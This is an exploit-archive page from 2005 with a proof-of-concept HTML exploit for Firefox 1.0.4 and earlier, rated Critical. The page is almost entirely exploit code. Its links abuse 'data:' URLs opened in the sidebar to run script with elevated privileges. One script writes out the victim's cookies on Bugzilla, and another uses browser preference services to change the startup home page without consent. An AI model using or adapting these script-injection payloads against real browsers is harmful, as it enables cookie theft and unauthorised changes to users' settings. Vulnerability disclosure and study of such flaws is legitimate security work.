exploits , vulnerabilities , articles , Mozilla Firefox <= 1.0.4 "data:" URLs Remote Script injection Exploit

Rated as : Critical 

// Exploit by Kohei Yoshino
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html;
charset=utf-8" />
<title>Sidebar Attack, Reloaded</title>
</head>
<body>
<p>1. <a href="#" target="_search"
onclick="location.href = 'https://bugzilla.mozilla.org/';">
Click here to <strong>open this page into
sidebar</strong>.</a></p>
<p>2. <a
href="data:text/html,<script>document.write(document.cookie);</script>">
Click here to <strong>steal your cookies</strong> on
Bugzilla.</a></p>
<p>3. Then, open about:config in content area.</p>
<p>4. <a
href="data:text/html,<script>Components.classes['@mozilla.org/
preferences-service;1'].getService(Components.interfaces.nsIPrefBranch).setCharPref('
browser.startup.homepage','http://www.mozdev.org/');</script>">Click
here to 
<strong>change your home page to
mozdev.org</strong>.</a></p>
</body>
</html>
securitydot.net - 2005-07-12